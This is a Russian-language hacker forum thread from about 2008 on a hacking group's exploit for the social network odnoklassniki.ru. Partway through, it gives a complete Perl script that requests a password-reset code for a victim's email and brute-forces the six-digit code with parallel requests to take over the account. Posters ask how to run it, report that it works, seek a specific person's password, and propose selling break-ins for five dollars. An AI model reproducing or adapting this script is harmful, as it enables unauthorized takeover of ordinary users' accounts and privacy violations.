Хакерская группа RST/GHC/UKT объявила в своем блоге, что ими создан эксплоит для сайта одноклассники.ру. Публикация для широкой общественности запланирована на 26 мая 2008г.

Подробности (http://rstghc.livejournal.com/14478.html?thread=95374#t95374)

Я жутко извиняюсь, но что такое эксплоит???

Я жутко извиняюсь, но что такое эксплоит???
киддерский инструмент чтобы всех похакать и быть крутым

МаТрОс

http://ru.wikipedia.org/wiki/Эксплоит

хы, тоже читаю их журнал =) жду одея

Эх, мне как раз надо с одноклассников один пароль, а то трояны не прокатили, фейки тоже.

Зачем в массы. Держали бы у себя или отослали тем же админам одноклассникам. А вот теперь сколько девочек тинейджеров будут плакать, потому-что их похэкали одай сплойтом =(

Зачем в массы. Держали бы у себя или отослали тем же админам одноклассникам. А вот теперь сколько девочек тинейджеров будут плакать, потому-что их похэкали одай сплойтом =(
согласен если сполойт появится в паблике
кидисы замучают всех сначала как его юзать
а потом темами "сломаю акк одноклассники"
этоже оружие массовго поражения
по мне так лучше пусть останется в привате
или пусть лучше сначала отдадут суппорту
а потом в паблик

GrAmOzEkA, туфта полная от RST/GHC ?
Подумай тридцатьдевять раз, прежде чем такое ляпнуть.
Полностью поддерживаю мнение Vid0k.

Vid0k +1

Должны вроде прикрыть дырку если в паблик выйдет. Не думаю что админы одноклассников будут сидеть и ждать пока куча акков будут сломаны.

Да они там щаз в панике валяются! Пока что можно воспользоваться этим и юзать сплойт!
(Белки правят миром! Мы их покорные рабы!)

а мы с егорычем говарили что эти парни еще скажут о себе громкое слово))))(када они закрывались)...
молодцы чуваки.. В паблик думаю не стоит опускать.....

давно пора +1 парням давно уже хекарь и закрывать эти социальные сети, нечё в них прикольного не вижу как только кроме утечки информации.

хех .. ну так неиграю =(
теперь приватный софт на однокласники уже неприватным будид

Долго сплойт не проживет.
Элементарно его скачает программер с одноклассов, и пока будет разбирать код, думаю сервак будет в дауне ака офф.
А потом багу просто закроют и все.
Думаю там люди тоже не дураки сидят.

сидели бы лучше, выкладывали древние сплоиты у себя в блоге
потянуло их тут на новинькое =\

На хек сайтах надо повесить объявление - взломаю акк одноклассников, 5 баксов, работу выполню 26го числа. За счет массовости нарубить бабла. Написать скрипт с эскплойтом, чтобы выглядело url_odnoklassniki.ru;mail_zakazchika@mail - чтобы сплойтить и сразу на мыло заказчику результат слать.

А я не думаю , что эта затея с пабликом зря ... ведь разобрав эксплойт мы все узнаем через что и как он работает, а это знания которые можно применить не только на одноклассниках!
Дыру залатают ну и что ? Она что последняя ?
Я думаю эт только начало -)

начало конца )))

Думаю поставят статус сервис временно приостановлен заходите через 2 часа.
К тому времени программеры залатают дырку.
А еще возможно что rst спецально распускают такой слух чотбы нарушить работу сервиса.

А еще возможно что rst спецально распускают такой слух чотбы нарушить работу сервиса.
Исключено.
Делать больше rst нечего, как распускать слухи, привликать лишнее внимание, и вообще заниматься ерундой.

Мне казалось rst уже давно распались и ничего нового не выпускают!!!..Или я не прав?
А насчет сплойта чушь полная, уже через день или пару он не будет работать.А значит смысла трудиться над ним и выпускать в паблик нет.

Мне казалось rst уже давно распались и ничего нового не выпускают!!!..Или я не прав?
А насчет сплойта чушь полная, уже через день или пару он не будет работать.А значит смысла трудиться над ним и выпускать в паблик нет.
да проект закрыли но парни все равно
держут контакты и общаются через ЖЖ
у них не такой смысл как у тебя они продолжают этим заниматься потому что им нравиться а не от того чтобы зафейсить сайт или поднять бабла на новом эксплоейте и им безразницы будет работать слойт через день или два после выхода в паблик
они просто еще раз всем докажут что
даже крупные и раскрученные проекты имеют уязвимости

Vid0k, абсолютно с тобой согласен. Кому интересно - http://rstghc.livejournal.com.

ой бля как пиарят себя

Будет интересно посмотреть на сплойт...

а сзади

http://rstghc.livejournal.com/14478.html?thread=101262#t101262

чето вроде глухо....

Брутфорс кода восстановления
#!/usr/bin/perl
use LWP::UserAgent;

print qq(
,__ __,
\\ \\ / /
\\ \\ __ _ / /
\\ .___/\\:::* /\\ /
|_____\\ |/ \\
/<>//,./ / _________
/ / / \\ | RST
/ /.,\\\\<>/\\ \\ | GHC
\\ \\ /' \\ / | UKT
\\ \\ / \\ |__\\xD____
\\ \\/ /
/ '''\\''' /
/ / \\ \\ / \\ \\
/ / ___ \\ / \\ \\
*__ __*
[preved odnoklassne4gi]

);



if (!scalar(@ARGV)) {
print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
exit();
}
if (-e "success") {
print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
exit();
}

my $email="$ARGV[0]";

if ($ARGV[1]) {
my $MAX_PROCESSES=$ARGV[1];
} else {
my $MAX_PROCESSES=5;
}
my $DEBUG=0;

my @pids;
my $npids=0;
my $restore=0;
my $e;

# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
print "\[-\] Please provide correct email address\n";
exit();
} else {
print "\[+\] Repair password code send to $email\n";
}

# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
if (-e "success") {
print "DONE";
exit();
}
if ($code==199999 && $not==1) {
$cod="099999";
$not=0;
$code=100000;
} elsif ($code=~/^1(\d+)$/ && $not==1) {
$code=~/^1(\d+)$/;
$cod="0$1";
} else {
$cod=$code;
}
if ($cod=~/^(\d+)000$/) {
print "#";
}

my $pid;
$pid=fork();
if($pid>0){
push(@pids,$pid);
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
}elsif(undef $pid){
print "fork error\n" if ($DEBUG);
exit(0);
}
$p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
$con=$p->content();
if ($con=~/password.confirmation/) {
print "$cod cached\n";
print LOG_FILE "$cod cached\n";
open(SUCCESS,">>success");
print SUCCESS "\n############################\n";
print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
print SUCCESS "############################\n";
print "############################\n";
print "Yahooo! Congratulations! Code for password repair is - $cod\n";
print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
print "############################\n";
close(SUCCESS);
} else {
print LOG_FILE "$cod failed\n";
}
exit();
}
close(LOG_FILE);

это он и есть? спс...
честно говоря, так и думал, что сплойт не будет тупо выплевывать пасс... рст кросавчеги

весело было сидеть в ИРКЕ и слушать всё.... потом часть людей отсеялось и вуаля..

весело было сидеть в ИРКЕ и слушать всё.... потом часть людей отсеялось и вуаля..
там еще тусует народ

у когото сплоит запустился?
у меня выдает:
This process make take max ~ 18 hours to check all combinations
You need good internet channel and fast cpu

Исходник читал?

а какой нужен? Я могу и с серва запустить.... Только если он запишет результат в лог какойто

там файл log появится в папке со сплойтом

там файл log появится в папке со сплойтом
а как он будет подписан?

с какими параметрами запускать?
и зачем нужен первый шаг?

всё работает...спасибо

хм... в таком случае будет будет война за короткий номерок(ид),поскольку еси 1 ломаеться около дня и то меньше то знач примерно каждый день да и часы будут укрыдваться самые красивые.лучшеб себе парни оставили.
P.s. извените за какието ошибка терпеть такие сайты немогу...

разве там есть ид?

Поменяют алгоритм скоро и все... чего вы паритесь.

Я так и не разобралась как это юзать))))
Ну и хрен с ним,мне одноклассники впринципе невпёрлись)))

Скоро его всё равно прикроют,не долго вам пировать осталось
А медведева можн ломануть???

нет

багу закроют в этот же день или на следующий и всей истории конец

ну что там? кто нить заюзал тулзой? :)) долго работает?

"for ($code=100000;$code<=999999;$code++) "

Жесть. Ну и программисты у однокласснечгов, кто бы мог подумать

ну что там? кто нить заюзал тулзой? :)) долго работает?
Система %банутая, завесила пару моих рутовых серваков (

diehard, ну это они конечно...)

код убил наповал.

Блин... Я в перле ни бум -бум... Знал что надо учить его =( Судя по всему чтото не так тут..
}
if ($cod=~/^(\d+)000$/) {
print "#";

В логе: 000000 failed

Мдя. Я в этот споит глянул (на самом деле там был еще и второй, чуток подправленый, тоже в паблике). Сам в однокласниках не вишу. Но по коду сплоита понял насколько там тупая система получения пароля ака "сделай запрос на востановления пасса -> получи на мыло шестизначный код-подтверждение- > введи его на сайте-> получи доступ к установке пасса" (ну это как мне кажется, не проверял) ..... только вот они не учли что этот шестизначный код-подтверждение не обязательно из мыла брать, а можно подобрать простеньким перловым скриптиком, юзающим либу UserAgent

да там просто брут шестизначного кода
баги как таковой нету

он вообще актуален?

он вообще актуален?

повторюсь....пашет?

Мля археологи. А проверить дак нельзя чтоли самому?

смотрим на дату создания темы, кстате я где-то читал что он на работает... но сам не тестил

+ за такой период времени разве дыру не прикрыли бы??